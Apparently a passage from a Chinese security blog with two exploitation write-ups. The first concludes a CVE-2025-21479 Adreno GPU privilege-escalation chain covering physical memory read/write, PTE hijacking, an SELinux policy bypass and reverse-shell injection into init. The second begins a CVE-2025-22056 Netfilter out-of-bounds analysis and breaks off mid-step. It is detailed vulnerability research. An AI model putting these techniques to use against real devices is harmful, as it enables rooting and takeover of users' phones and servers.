然而，用户态无法直接获知自身内存的物理地址。为解决此问题，采用以下策略：

大量喷射匿名内存页：以此占据大量的物理页面，提高猜测命中概率。
物理地址猜测：选取多个高概率命中的候选物理地址 P 作为假定的页表地址。
精心设计虚拟地址映射：选择一个虚拟地址 V（例如 0x40403000），使其在各级页表行走中的索引均相同。此设计允许通过修改单个页表页（P）即可完成从 V 到任意目标物理地址 P_target 的映射，极大简化了页表操作。

定位受控页表

为确认哪个被喷射的页面其物理地址恰好为猜测的 P，需进行以下验证：

通过GPU特权指令向虚拟地址 V 写入一个特定魔数 x。若 P 此时确实是我们的匿名页，则GPU可以通过TTBR找到V对应的P 并向其中写入魔数。

1
2
3

*drawstate_cmds++ = cp_type7_packet(CP_MEM_WRITE, 3);
drawstate_cmds += cp_gpuaddr(drawstate_cmds, 0x40403000); // 目标虚拟地址 V
*drawstate_cmds++ = 0x42424242; // 欲写入的魔数值 x

在用户态遍历所有喷射的匿名页，检查其中内容。若发现某个页面包含魔数 x，则可断定该页的物理地址即为 P。至此，我们获得了一个已知其物理地址 (P) 和虚拟地址的可读写内存页。

实现任意物理地址写

一旦确定了页表页 P，写入任意物理地址 P_target 的过程变得直接：

修改映射：在已定位的页表页 P 中，修改虚拟地址 V 对应的页表项，使其指向目标物理地址 P_target。
执行写入：再次使用 CP_MEM_WRITE 指令向虚拟地址 V 写入数据。GPU会根据恶意页表，将数据实际写入物理地址 P_target。

实现任意物理地址读

GPU指令集未提供直接的内存读取指令，因此读取操作需要通过内存拷贝指令 CP_MEM_TO_MEM 间接实现。有两种策略：

拷贝至TTBR0页 (P)：将目标物理地址 P_target 的内容拷贝至已控制的物理页 P 的某个偏移处。随后，在用户态直接读取该匿名页的对应虚拟地址，即可获得 P_target 的数据。
- 风险：此操作会覆盖页表页的部分内容，需谨慎管理拷贝偏移量，或在执行后重新修复页表项。
使用专用接收页 (P3)：更安全的方法是喷射并定位另一个物理页 P3 作为专用的数据接收缓冲区。将 P_target 的数据拷贝至 P3，然后在用户态读取 P3 对应的虚拟地址。这避免了污染关键的页表结构。

此外，CP_MEM_TO_MEM指令只能拷贝4或8字节的内存，若需要拷贝16字节，则需要执行两遍该指令。由于漏洞只存在于A7xx设备，不妨直接使用A6xx引入的CP_MEMCPY指令，它实现了两个地址指定length的对拷，效率更高。

1	<value name="CP_MEMCPY" value="0x75" variants="A6XX-"/>

物理基址探测与内核信息泄露

在成功构建物理地址读写原语后，攻击者便具备了直接探查和篡改内核运行时数据的能力，这是实现最终提权的关键跳板。

定位内核物理内存基址

绝大多数安卓设备的内核物理内存加载基址在每次启动时是固定的。通过查询设备信息或利用已知的通用偏移（例如 0xA8000000, 0x80080000 等），攻击者可以从此地址开始直接读取内存，从而将内核的代码和数据段完整地dump下来。这份原始内存镜像足以让攻击者进行离线分析，精确计算出该特定内核版本中关键数据结构（如 selinux_state）、函数地址以及防护机制（如 KASLR 偏移）的偏移量，进而编写出最终的利用载荷。

对于少数实施了内核物理地址空间布局随机化（PhyASLR）的厂商（如三星），其随机化强度通常较弱。正如研究员Pan Zhenpeng和Jheng Bing Jhong在其研究中指出的：

“Samsung’s PhyASLR is aligned with 0x10000 and quite weak, by checking the instructions of _stext, can bypass it within 20 times.”

因此，通过遍历数个按0x10000对齐的候选地址并验证其内容是否包含有效的内核指令签名，即可快速爆破出随机化后的实际基址。

直接内存dump的效率瓶颈

然而，通过 CP_MEM_TO_MEM或是CP_MEMCPY 进行大规模数据转储存在显著性能瓶颈：

规模限制：该指令一次操作最多拷贝一页（0x1000字节）的数据。若要传输更多数据，必须准备大量的专用物理页（ P4、P5、…）作为接收缓冲区，并进行多次迭代。
缓存同步开销：每次内存操作后，都必须同步CPU与GPU缓存，以确保数据一致性，这引入了巨大的性能开销。

完整泄露一个50MB大小的内核镜像需要数万次这样的操作，效率捉襟见肘。

策略转变： targeting PTE 页表

鉴于直接dump效率低下，且此时尚未获取到内核虚拟地址布局的具体信息（如 swapper_pg_dir），我转变了利用策略：转而在物理内存中扫描寻找存有用户空间页表项（PTE）的页表页。

通过修改这些PTE项，可以重新映射用户态虚拟地址，从而绕过传统的内存读取指令，以更高的效率实现大规模数据泄露。这为后续更复杂的利用步骤提供了一个高效的数据通道。

关于PTE页表的攻击，Nicolas Wu在Dirty Pagetable研究中做出了杰出贡献，这里不在过多展开。

文中提到，给PTE用的内存分配自MIGRATE_UNMOVABLE free_area，而用户的匿名页分配自MIGRATE_MOVABLE free_area，这两者会让相同的虚拟地址非常难以复用。不过现在的场景是希望系统复用相同的物理地址，实际测试发现这似乎并没有那么困难。

“The root cause for this is that the physical pages allocated by anonymous mmap() usually come from the MIGRATE_MOVABLE free_area of the memory zone, while user page tables are usually allocated from the MIGRATE_UNMOVABLE free_area of the memory zone. This makes heap spray difficult to succeed. The research presented by Yong Wang explained such difficulty very well.“

假设一台拥有8GB物理内存的设备，在攻击初期剩余约6GB可用内存。在定位TTBR0页的步骤中，通过喷射匿名页已消耗约2GB（记为 M0），系统仍剩余约4GB可用内存。可以通过检查/proc/meminfo来查看系统内存的实时状态。

操作流程如下：
0. 预留PTE喷射内存：通过fork创建 N 个worker，每个worker通过mmap()预留大量（例如 0xfe00 个）2MB的虚拟地址空间区间，但暂不进行读写操作。此步骤仅保留虚拟地址范围，并未分配物理内存或创建PTE。
- 选择 0xfe00 是为了规避 /proc/sys/vm/max_map_count的系统限制（通常为 0xFFFA）。
- 每个2MB映射最终将对应一个PTE页，因此此预备步骤为后续最多喷射254MB的PTE页做好了地址空间准备。

耗尽Movable内存：分配大量匿名页（M1，约3GB），将系统中剩余的空闲内存几乎耗尽。可通过监控 /proc/meminfo 中的 MemAvailable 字段确认。
释放非关键内存：释放之前用于定位TTBR0页的非关键匿名页（M0’，约2GB）。此操作释放d的内存使 MemAvailable 回升约2GB。
喷射PTE页：按顺序激活所有worker，通过读取每个2MB区间的首个字节来触发页错误。内核在处理错误时，会为该虚拟地址区间分配并初始化一个PTE页。持续此过程，直到系统可用内存再次耗尽（甚至开始使用交换分区），此时大量PTE页已被喷射到物理内存中。
扫描定位PTE页：利用已有的物理内存读写能力，在已知的TTBR0页附近扫描具有PTE页特征（如特定格式的页表项）的物理页。测试证明，此方法能高效发现PTE页：

[+] main.c:1612 [STEP] searching ttbr0 page ....
[*] main.c:349 guessing ttbr0 phyaddr: 0xa67e0000 ...
[+] main.c:432 found ttbr0 phys: 0xa67e0000, virt: 0x7215e3d000
[+] main.c:1617 [STEP] searching leak page ...
[*] main.c:1622 guessing leak page 0xa67e1000 ...
[+] main.c:484 found leak page, phys: 0xa67e1000, virt: 0x7215e3e000
[+] main.c:1536 [STEP] searching pte page ...
[*] main.c:906 search_pte_page dump 0xae7e0000:
00000000 - 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |  ................ 
00000010 - 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |  ................ 
[*] main.c:906 search_pte_page dump 0xa77e0000:
00000000 - C3 5F 98 AA 00 00 60 01  00 00 00 00 00 00 00 00  |  ._....`......... 
00000010 - 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |  ................ 
[+] main.c:912 found PTE page!!!

一旦定位到PTE页，即可构建一个高性能的数据泄露引擎：

建立映射：修改该PTE页中的第一项，使其指向该PTE页自身的物理地址。这意味着，某个特定的用户态虚拟地址（由worker的mmap地址决定）将被映射到这个PTE页的物理内存。
轮询检测：让所有worker检查其各自2MB区间的头8个字节。哪个worker读到了我们写入的特定魔数（即自指向的PTE值），就证明其虚拟地址空间映射到了目标PTE页。

[+] main.c:1568 [STEP] searching modified pte ...
[+] main.c:1576 build evil pte: 0x600000a77e0f43
[*] main.c:1579 searching ...
[*] pte_spray.h:473 found pte check val:
00000000 - 43 0F 7E A7 00 00 60 00  00 00 00 00 00 00 00 00  |  C.~...`......... 
00000010 - 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |  ................ 
[+] main.c:1585 found pte page at virt 0x1faa400000, worker 11

大规模泄露：通过修改这个受控的PTE页，可以将其余PTE项指向任意目标物理地址。随后，直接读取对应的用户态虚拟地址即可一次性获取连续2MB的内核物理内存数据，效率相比单次0x1000字节的拷贝提升了数个数量级。

通过构造恶意的PTE页表，现在可以一次读取连续的2MB内存，大大提升内核镜像信息泄露的速度。
也可以通过mmap文件并修改page属性来修改文件的page cache，正如PAN ZHENPENG 和 JHENG BING JHONG 在他们的slide中所做的那样，也可以通过改文件page cache以注入代码到init来泄露内核信息：

Obtain kernel offsets without firmwares - Combine together:
Hijack init to chmod 0777 for dir /data/local/tmp, thus make root user can create/write the file under this dir (or setuid later to skip this)
Read target offsets info and copy contents into /data/local/tests dir
Transition our context to u:r:shell:s0 and cp boot.img from /data/local/tests to /data/local/tmp
Untrusted_app can get the offsets from /data/local/tmp
(Optional) get offsets from boot.img

Example Demo:

带着内核符号攻克内核

在获取了内核信息并建立了稳定的物理内存读写原语后，实现本地权限提升便成为可能。具体的利用路径则取决于目标设备所启用的内核防护机制。

策略一：直接代码段修补（针对默认防护）

在缺乏额外强内核保护（如Samsung KNOX, Huawei HKIP）的标准安卓系统上，最直接的方法是篡改内核代码段（__text）本身。

思路如下：

重映射代码段为可写：通过修改GPU的TTBR0页表中对应内核代码段物理地址的页表项（PTE），将其内存属性从“只读”更改为“可写”。这绕过了CPU侧的内存管理单元（MMU）对只读页的硬件保护。
修补关键安全函数：直接在内核镜像中定位并修补关键的安全检查函数。常见的修补目标包括：
- 禁用SELinux：将 selinux_state 中的 enforcing 字段置0，或修改 selinux_enforcing 指针。
- 提权系统调用：修补 setresuid、setresgid、capset 等函数的实现，使其跳过权限检查逻辑，直接成功返回。
触发提权：完成修补后，在用户态直接调用被篡改的系统调用，即可获得root权限。此方法直接、高效，但依赖于对代码段的写入能力。

策略二： data only attack

在搭载了KNOX、HKIP或类似强内核完整性保护机制的设备（如三星、华为旗舰机型）上，上述方法通常失效。这些保护机制会监控内核代码段和只读数据段的完整性，任何修改都会触发系统重启。因此，利用策略必须转向攻击其保护范围的盲区。

在默认保护的系统上，我们可以通过修改GPU的TTBR0页表项中PTE项所描述的的页属性将内核代码段对应的内存重映射可写，进而修补内核镜像中关键的函数保护点。如关闭selinux，或是patch setresuid、setresgid、capset等关键安全函数，之后用户态便可直接调用这些修补后的syscall提权。

而在有额外保护的机型上（如三星、华为等）由于KNOX、HKIP等保护的存在，将代码段重映射为RW并不可行，仅能在内核data段和修改文件page cache中寻找提权的机会。

正如DARKNAY在《「AVSS研报」iOS•Android•鸿蒙安全对抗能力初评报告-内核篇》中所指出的：

HarmonyOS 4.2版中HKIP机制与RKP机制保护能力相当，其保护了代码段、只读数据段、内核重要结构体等不被篡改。但是对于应用程序页表缺乏保护，攻击者可以通过修改应用程序页表任意读写未被HKIP保护的物理地址，该利用方法也被验证在Pixel、Samsung Galaxy上同样可行。
在HarmonyOS NEXT中，可以看到HKIP提供了多种保护机制，但是在实际研究过程中发现，除了代码段、只读数据段以及内核页表存在HKIP保护外，其余重要结构体并未被保护。
以下为部分HKIP机制与RKP机制中的防御能力覆盖范围比较：

这份评估揭示了此类防护体系的一个关键弱点：其保护重心在于内核自身的静态完整性，而对于动态的用户空间映射机制和策略数据结构的保护存在不足。这为高级利用提供了两条清晰的路径：

操纵应用程序页表：正如我们之前构建PTE攻击链所做的那样，HKIP/RKP通常不保护用户进程的页表。攻击者可以继续利用此原语，篡改用户态PTE来达成劫持用户态应用的目的
篡改SELinux策略：SELinux的策略强制执行依赖于内核内存中的策略数据库。这些策略数据通常不被HKIP/RKP机制视为需要保护的“只读数据”或“代码”。因此，攻击者可以篡改数据以禁用selinux。

攻克SELinux：精准绕过强制策略

在获取内核物理地址读写能力后，绕过SELinux成为提权路径上的关键一步。最直观的思路是修改 selinux_state 结构中的 enforcing 字段。然而，在目标设备上，内核编译时未启用 CONFIG_SECURITY_SELINUX_DEVELOP 选项，导致该字段不存在，此路径无效。

1 2	$ adb shell zcat /proc/config.gz \| grep CONFIG_SECURITY_SELINUX_DEVELOP # CONFIG_SECURITY_SELINUX_DEVELOP is not set

struct selinux_state {
#ifdef CONFIG_SECURITY_SELINUX_DISABLE
bool disabled;
#endif
#ifdef CONFIG_SECURITY_SELINUX_DEVELOP
bool enforcing;
#endif


#ifdef CONFIG_SECURITY_SELINUX_DEVELOP
static inline bool enforcing_enabled(struct selinux_state *state)
{
return READ_ONCE(state->enforcing);
}
#else
static inline bool enforcing_enabled(struct selinux_state *state)
{
return true;
}
#endif

策略一：禁用SELinux初始化状态（已弃用）

深入分析SELinux的权限检查函数 security_compute_av，发现其存在一个初始化状态检查：若 selinux_initialized(state) 返回 false，则直接跳转至 allow 标签，授予所有权限。

avc_has_perm
  avc_has_perm_noaudit
    avc_compute_av
      security_compute_av

// --------------

void security_compute_av(struct selinux_state *state, ...)
{
...
if (!selinux_initialized(state))
goto allow;
...
allow:
avd->allowed = 0xffffffff; // 允许所有操作
goto out;
}

static inline bool selinux_initialized(const struct selinux_state *state)
{
return smp_load_acquire(&state->initialized); // 读取 initialized 字段
}

因此，将 selinux_state->initialized 字段修改为 0 即可全局禁用SELinux。然而经测试，此举会导致系统出现一些副作用，故弃用此方案。

策略二：操纵策略库实现恒允访

我们转而采用一种更精准、副作用更小的方案。其核心在于利用 security_compute_av 函数中另一处逻辑，通过控制策略数据使所有权限检查恒返回允许。

关键逻辑位于 unmap_class() 调用之后：

void security_compute_av(struct selinux_state *state,
 u32 ssid,
 u32 tsid,
 u16 orig_tclass,
 struct av_decision *avd,
 struct extended_perms *xperms)
{
struct selinux_policy *policy;
struct policydb *policydb;
...
policy = rcu_dereference(state->policy);
policydb = &policy->policydb;
...
tclass = unmap_class(&policy->map, orig_tclass);
if (unlikely(orig_tclass && !tclass)) { // 条件A：orig_tclass有效但tclass为0
if (policydb->allow_unknown) // 条件B：策略允许未知
goto allow; // selinux bypass
goto out;
}
...
allow:
avd->allowed = 0xffffffff;
goto out;
}

static u16 unmap_class(struct selinux_map *map, u16 tclass)
{
if (tclass < map->size)
return map->mapping[tclass].value;

return tclass;
}

该代码段的逻辑是：如果一个orig_tclass在经过 unmap_class() 后结果为0，且系统策略配置为允许未知对象类（policydb->allow_unknown == true），则授予全部权限。

这为实现绕过提供了两条清晰的修改路径：

启用未知类允许：修改selinux_state->policy->policydb->allow_unknown为1（true）。
破坏类映射表：修改 selinux_state->policy->map->mapping 指向的映射数组，确保对于任何有效的 orig_tclass，函数 unmap_class 都返回 0。这可以通过篡改 selinux_mapping 结构中的 value 字段实现。

/* Mapping for a single class */
struct selinux_mapping {
u16 value; /* policy value for class */
unsigned int num_perms; /* number of permissions in class */
u32 perms[sizeof(u32) * 8]; /* policy values for permissions */
};

/* Map for all of the classes, with array size */
struct selinux_map {
struct selinux_mapping *mapping; /* indexed by class */
u16 size; /* array size of mapping */
};

此方法仅篡改策略数据，不干扰SELinux的状态机，有效避免了直接禁用初始化所带来的副作用。

向 init 注入 reverse shell shellcode

将init用到的共享库用只读方式映射到内存空间，控制PTE修改页表项为读写即可修改文件page cache，从而劫持init的执行流。由于共享库会被很多进程使用，而修改page cache后的变化会应用到所有进程，shellcode需要额外判断一下调用者是否为init，并在fork后执行反弹shell代码。

example：

最后是完整提权演示：

总结与思考

CVE-2025-21479从GPU固件的逻辑缺陷到最终的本地提权，攻击者需要精准地操控内存分配、利用硬件特性绕过软件保护、并深刻理解内核安全子系统的内部机理。这一过程充分展现了现代漏洞利用技术的高度复杂性和精巧性。

然而，正如我们所看到的，即便拥有如此强大的原始能力——任意物理地址读写——在实际攻击中仍面临重重障碍：需要对抗内存分配器的隔离策略，需要爆破或扫描以定位关键数据，需要精心设计才能稳定地篡改策略而非导致系统崩溃。这一切都清晰地指向一个结论：当今安卓系统的防御体系已经日趋成熟，攻守双方的力量对比正在发生根本性的转变。防御方通过多年的积累，构建起一个由硬件隔离（如TrustZone）、内核完整性保护（如RKP/HKIP）、运行时监控（如SELinux）、和沙箱隔离组成的多层次、纵深化防御体系。攻击者往往需要连续突破多个互不信任的安全层，其门槛和不确定性已被极大地提高。一个漏洞，即便强如CVE-2025-21479，也更多是作为一把开启后续攻击链的“钥匙”，而并非一锤定音的终极武器。

CVE-2025-21479既是对过去攻击技术的总结，也是对未来防御的启示。它证明，尽管攻击技术依然在向更高精尖的方向发展，但防御体系已经构筑了足够坚固的壁垒，使得攻击的成本和代价变得极其高昂。安全不再是单点技术的比拼，而是整个系统生态、供应链响应速度、以及攻防思维理解的全面竞争。移动安全进入了一个新的阶段，在这个阶段中，防御者正逐渐夺回主导权，但丝毫的松懈都可能让局势逆转。这场永恒的博弈，将继续驱动着技术创新，迈向更安全的数字未来。

参考

Netfilter Tunnel 之殇：CVE-2025-22056

2025-05-28T05:13:00.000Z

在一个多月前，Linux 内核中的 Netfilter 模块下针对 nft_tunnel 中存在的一处越界写漏洞补丁被提交到内核主线，该漏洞被分配为 CVE-2025-22056，本篇文章旨在通过利用该漏洞对内核实现提权，同时该漏洞影响 Linux Kernel Version5.7-6.14 所有版本，由于在 Ubuntu 中该模块被添加为默认配置，因此该漏洞对于未打补丁的 Ubuntu 系统仍然能够有效提权。

一、背景介绍

1.1 什么是 Netfilter？

Netfilter 是 Linux 内核中的一个框架，主要用于对网络数据包进行处理。它提供了 hook 机制，使得数据包可以在被处理的过程中，在内核级别被“拦截”，进而决定对数据包的行为，包括检查、修改、接受或丢弃等。Netfilter 构成了 Linux 防火墙、NAT（网络地址转换）等功能的基础，是 Linux 网络安全和数据包控制的核心模块。

Netfilter 的核心功能：

包过滤（Packet Filtering）
- 决定是否允许一个数据包通过
- 用于实现防火墙逻辑
NAT（网络地址转换）
- 动态修改数据包中的 IP 地址或端口
- 支持源地址转换（SNAT）和目的地址转换（DNAT）
连接跟踪（Connection Tracking）
- 跟踪每个网络连接的状态
- 可以判断数据包是否属于已建立的连接（如 ESTABLISHED）
状态防火墙（Stateful Firewall）
- 配合连接跟踪，实现有状态的包过滤规则（例如只允许建立连接的返回流量）
数据包修改（Packet Mangling）
- 支持对包头或数据内容进行修改

1.2 为什么是 Netfilter？

Netfilter不仅是 Linux 内核强大功能的一部分，同时也是攻击者重点关注的攻击面，理由如下：

深度依赖用户输入（数据包）：Netfilter 模块直接处理外部网络数据，攻击者可以伪造恶意数据包进行模糊测试或构造边界条件。

内核态运行，特权高：一旦触发漏洞，可能导致内核崩溃（DoS）或提权（LPE）。

模块复杂，状态追踪多：如连接跟踪（conntrack）、NAT、匹配模块等涉及复杂状态机，容易产生边界处理错误、UAF、整数溢出等漏洞。

大量代码基于宏和结构体嵌套：容易导致逻辑错误、缓冲区处理不当。

1.3 什么是 Netfilter Tunnel？

Netfilter Tunnel 是指利用 Linux 内核中的 Netfilter 框架对网络隧道数据进行处理和控制的技术体系。作为 Linux 网络栈的核心组件，Netfilter 为各种隧道协议提供了强大的数据包过滤、修改和转发能力，是构建现代虚拟化网络基础设施的关键技术。

二、漏洞分析

在本篇文章中测试版本为 Linux-6.12.6，commit 1b755d8eb1ace3870789d48fbd94f386ad6e30be 给出了针对该漏洞的 patch，内容如下：

通过上面的代码不难发现，该漏洞是一处类型混淆错误，原本的代码中(struct geneve_opt *)opts->u.data + opts->len的逻辑是先对opts->u.data进行类型转换，之后在对转换后的指针相加 opts->len ，从而导致相加的长度实际是 opts->len * 4 （结构体 geneve_opt 的大小为 4 byte），间接导致在后面的 memcpy 代码处会发生越界写错误。

2.1 Basics

为了对漏洞有更好的理解，这里对部分关键知识进行说明

1. nlattr

该结构体是 Linux 内核网络子系统中 Netlink 协议使用的基本属性结构体 struct nlattr，常用于用户空间与内核空间之间通过 Netlink 消息交换附加数据（如 tunnel 配置、策略等）时的数据封装。

2. geneve_opt

每个 GENEVE Option 由固定的 4 字节头部 + 可变长度的数据组成，struct geneve_opt 就是对这 4 字节头部的结构体抽象。opt_class 表示该选项的“类”，类似于协议命名空间，type 表示选项类型， u8 length:5 表示 opt_data 的长度，以 4 字节（即 32 位）为单位，实际长度 = length * 4 字节。

**3. nft_tunnel_obj/nft_tunnel_opts **

这两个结构体 struct nft_tunnel_opts 和 struct nft_tunnel_obj 是 Linux 内核中 Netfilter 子系统的一部分，用于描述隧道封装元数据（如 VXLAN、ERSPAN、GENEVE 等）并与 Netfilter 的对象机制结合，从而在 nftables 中实现基于隧道元数据的匹配、处理或封装操作。层级关系如下：

4. nla_put

用于向 struct sk_buff 类型的 socket buffer 中添加一个 Netlink 属性（netlink attribute），这是 Linux 内核中 Netlink 通信的一部分，用户空间与内核空间的数据交换，__nla_put() 是实际将属性插入到 skb 中的内部函数。

而__nla_put本质是一个memcpy函数，其中nla_data(nla) = (char *) nla + NLA_HDRLEN。

2.2 OOB-Write

do_syscall_x64–>x64_sys_call–>__x64_sys_sendmsg–>__sys_sendmsg–>___sys_sendmsg–>sys_sendmsg–> __sock_sendmsg–> sock_sendmsg_nosec–>netlink_sendmsg–>netlink_unicast–>netlink_unicast_kernel–>netlink_rcv–>nfnetlink_rcv–>nfnetlink_rcv_skb_batch–>nf_tables_newobj–>nft_obj_init–>nft_tunnel_obj_init --> nft_tunnel_obj_opts_init–>nft_tunnel_obj_geneve_init

漏洞触发时的调用函数堆栈如上所示，这里重点关注分析与漏洞利用相关的函数，具体如下：

1. nf_tables_newobj

该函数执行流大体含义为，首先确保消息中包含必须的属性：对象类型（NFTA_OBJ_TYPE）、对象名称（NFTA_OBJ_NAME）、以及对象数据（NFTA_OBJ_DATA)，调用 nft_table_lookup 查找指定的 nft_table，调用 nft_obj_lookup 查找目标表中是否已存在具有相同名称和类型的对象，之后在经过相关检查和初始化之后进入到函数 nft_obj_init中。

2. nft_obj_init

该函数主要负责完成nft_obj的创建和初始化功能，其中第一个红框中的代码负责申请结构体内存，在测试版本中该结构体大小为 0x1d8，需要提前说明的是该结构体即为后续发生越界写时的结构体，注意这里分配标志是GFP_KERNEL_ACCOUNT，这为后续选择利用的结构体作铺垫。第二个红框中的代码则是通过函数指针的方式将结构体的初始化交由 Netfilter Tunnel 中的nft_tunnel_obj_init 函数进行处理。nft_obj 结构体内容如下，其中注释已对每个字段进行了解释。

3. nft_tunnel_obj_init

该函数功能大致为初始化隧道信息结构，设置源端口和目标端口，解析用户提供的标志位，设置服务类型（TOS）和生存时间（TTL），初始化隧道选项（如扩展信息）存储到 priv->opts，该部分内容对应为上图红框中的函数进行处理。

4. nft_tunnel_obj_opts_init

该函数首先通过执行nla_validate_nested_deprecated函数，参数nft_tunnel_opts_policy 中定义的规则确保传入的 Netlink 消息满足规定条件。进入到nla_for_each_attr循环遍历用户传递的每一个nlattr属性，通过设置nla_type 属性为NFTA_TUNNEL_KEY_GENEVE_TYPE，确保执行流可以走到漏洞触发函数nft_tunnel_obj_geneve_init。

5. nft_tunnel_obj_geneve_init

经过漫长的调用链跟踪，来到了开头提到的漏洞触发函数，该函数负责处理GENEVE隧道特有的选项。这里不妨重新思考如何将该类型混淆错误转换为越界写，上图中 attr 参数是用户可控的，参数 opts 由前面函数nft_tunnel_obj_init 中 &priv->opts传递而来的，而 priv = nft_obj_data(obj) ，所以 priv 实际指向的是nft_obj的data字段，初始opts->u.data指向数据区开头，且此时opts->len为0。

由于这里牵扯到多个结构体的内部类型转换，在理解上有一定困难，所以为了帮助理解，这里给出nft_object、nft_tunnel_opts、geneve_opt三个结构体层级关系：

从上图可以发现，三者实际是相互嵌套的关系，opts->u.data中会存储所有geneve 隧道类型的结构数据，且需要辨析的是opts->len 是u32类型，以 1byte 为单位长度；opt->length 是 5bit，以 4byte 为单位长度；attr->nla_len 是 u16类型且以 1byte 为单位长度，data_len = nla_len(attr) 实际返回的是atrr->nla_len - NLA_HDRLEN = atrr->nla_len - 4 ，该字段由用户控制。

再回头看漏洞函数，其中nla_parse_nested按照 nft_tunnel_opts_geneve_policy 的规范，从 Netlink 消息中嵌套的 Geneve 隧道选项属性中提取各字段到 tb[]，在该函数中会对传递的 nlattr 中的 nla_len 长度字段进行检查，在漏洞触发版本，针对 Geneve 隧道选项 DATA 的长度被设置为 128 byte，因此nla_len 的长度不能超过 132 byte（包括 4byte 头部长度），即 0x84 大小。

在实际利用过程中，我们至少需要发送两个NFTA_TUNNEL_KEY_GENEVE_DATA 类型的 attr 消息才能触发漏洞，理由是初始 opts->len 为0，在经过第一次 Geneve 消息处理时， opts->len 才会被设置为 sizeof(*opt) + data_len ，在前面提到 attr 由用户可控，因此 data_len 长度也由用户控制，这样就会间接导致opts->len可控，而在第二次处理 Geneve 消息时，此时先前的类型混淆错误便会发生作用，导致 opt 实际指向的位置为 opts->u.data + opts->len * 4，而正常应该指向的位置是opts->u.data + opts->len，因此实际指向的偏移位置扩大了4倍，导致足够溢出到下一个结构体堆块。

实际溢出情况如上图所示，这里设置第一个 Gneneve 消息的 nla_len 长度为 0x58，计算得到的data_len 为0x54，从而 opts->len 为 0x58，该长度用来控制写的偏移位置，下一次写的位置则为 opts->u.data + 0x58*4 + 4 ，在测试版本中opts->u.data 指向的是 nft_object 相对偏移 0x90 的位置（则opt->opt_data = 0x90 + 4 = 0x94），因此下一次写的位置相对偏移为0x90 + 0x58*4 + 4= 0x1f4，该位置即为 Second geneve 写的位置，此时只要通过设置 Second geneve 的 nla_len 字段，即可设置溢出下一个堆块的字节长度，同时需要注意的是溢出的长度是 4byte 的整数倍。

上图为第一次处理 First Geneve 时的拷贝情况，如前面所述一致，第二次拷贝导致溢出时的情况如下图所示：

这里将第二次的 Second geneve 消息的 data_len 设置为了 0x10，导致最终的结果是可以溢出到下一个堆块的前4个字节，实际溢出的长度可以通过控制 data_len 来设置溢出到下一个堆块的长度。对应用户空间的部分payload内容如下：

至此我们有了一个偏移溢出写。

2.3 OOB-Read

继续回到梦开始的地方，这里针对类型混淆添加了两处 patch，第一处即为我们先前在 OOB_write 中分析的函数，后面一处针对nft_tunnel_opts_dump 函数的 patch，同理该函数可以将 opts->u.data 中的数据 dump 下来传递到用户空间，由于类型混淆的存在因此可以想办法越界读下一个堆块的数据内容。

1. nft_tunnel_opts_dump

该函数支持处理 Vxlan、Erspan 或 Geneve 三种隧道的数据，这里只需要关注 Geneve 即可，为了说清楚如何触发越界读，还需要回到 nft_tunnel_obj_geneve_init 函数初始化结构体opts当中，

2. nft_tunnel_obj_geneve_init

在前面已经提过data_len 的最大长度可以被设置为 0x80，而先前在介绍 geneve_opt 结构体时，我们关注到该结构体的length 字段为 5 bit，即 length 的最大值应为 0x1F，因为 opt->length = data_len / 4，而当 data_len 被设置为 0x80 时，有 0x80 / 4 = 0x20，此时会造成溢出导致 opt->length 被设置为了0（该整数溢出于同一天在 References[2] 中修复）。

而 memcpy 拷贝时候的长度又是按照 data_len 字段来拷贝的，也就是 0x80 个字节，由于前一个结构体 geneve_opt 的 opt->length 被设置为0，这会导致在函数nft_tunnel_opts_dump中解析结构体 geneve_opt 数据时，误将用户传递的 opt_data 内容当做下一个 geneve_opt 结构体的 header 来进行处理，因此我们可以伪造一个 fake geneve_opt 结构体，从而配合类型混淆错误实现越界读。

具体过程如上图所示，通过设置 fake_opt->length = 0x15，刚好可以将相邻的下一个结构体内容继续当做 geneve_opt 结构体去解析，对应 geneve_opt:length 字段，位于第三字节偏移处的 5 bit，意味着只要下一个结构体的对应 length 字段处不为0，就可以读出下一个结构体的内容，同时只要满足opts->len > offset循环条件，在 length 为0时，依旧可以继续读后面的内容。由于内核堆地址的随机性，且通过堆喷特定类型的结构体（GFP_KERNEL_ACCOUNT），可以实现泄露出相邻堆块的数据。

通过gdb调试，也可以明显看到此时 opt->opt_data 已指向下一个堆块的内容，其中包括一些有明显特征的堆地址。

三、漏洞利用

我们现在有了一个越界写和越界读，但是越界读依赖下一个结构体中的内容。

3.1 Leak heap addr

首先看如何利用只能leak出不确定数据的越界读漏洞来稳定leak出下一个堆块的数据。

通过前面的分析如果下一个堆块的开头8字节是一个指针，第四个字节的5bit会被当作geneve_opt->length比如0xffff888109412580的第四个字节为0x09，那么就可以leak出下一个堆块的0x204 ~ 0x204 + 4 * 9 的数据，由于越界读不涉及指针破坏，因此可以多次尝试，直到 leak 出想要的数据。

回顾前面nft_object结构体的字段，可以发现该结构体开头有一个list_head字段，所有创建在同一个table的nft_object都会通过这个双向链表连接，那么有这样一个想法，连续分配两个能够leak的nft_object，它们如果相邻，那么就可以通过前一个nft_object来leak出下一个nft_object的list->prev指针，从而得到这两个连续nft_object的堆地址（是否相邻可以通过list、rhlhead里的几个指针字段的特征进行判断）。

比如说在上图中，就可以通过nft_obj1越界读取到nft_obj2的list_head->prev字段，由于每次只重复分配两个nft_object，那么nft_obj2中list_head字段的prev（图中为0xffff8881023f5a00）必定指向nft_obj1的堆地址，又因为两者相邻，则nft_obj2的堆地址也可知。

3.2 Root by io_uring table

在泄露完堆地址后，这里主要通过两种方式来实现提权，第一种是通过利用 io_uring table 实现任意地址读写。

申请的 table 数组大小也是可控的，分配标志也是GFP_KERNEL_ACCOUNT，不过需要注意的是这里需要通过setrlimit(RLIMIT_NOFILE, &rl)调整文件描述符数量限制，使得 table 数组可以从 kmalloc-cg-512 中分配缓存，原因如下：

在io_sqe_files_register函数中会对nr_args的大小进行检查，使得正常情况下nr_args的大小最大支持 kmalloc-cg-256 大小的 table 数组的分配，由于 0x108 也会从 kmalloc-cg-512 中分配，这里以该值为例，计算nr_args 需要至少为 ((0x108 / 8) * PAGE_SIZE) / 8 = 0x4200，其中 0x108 表示 table 数组的大小（注意这种分配方式在 commit 7029acd8a950393ee3a3d8e1a7ee1a9b77808a3b) 中已被去除）。关于通过修改table数组指针实现任意写原理，可参考 Reference[3]。

具体利用步骤如下：

任意地址写

Step.1

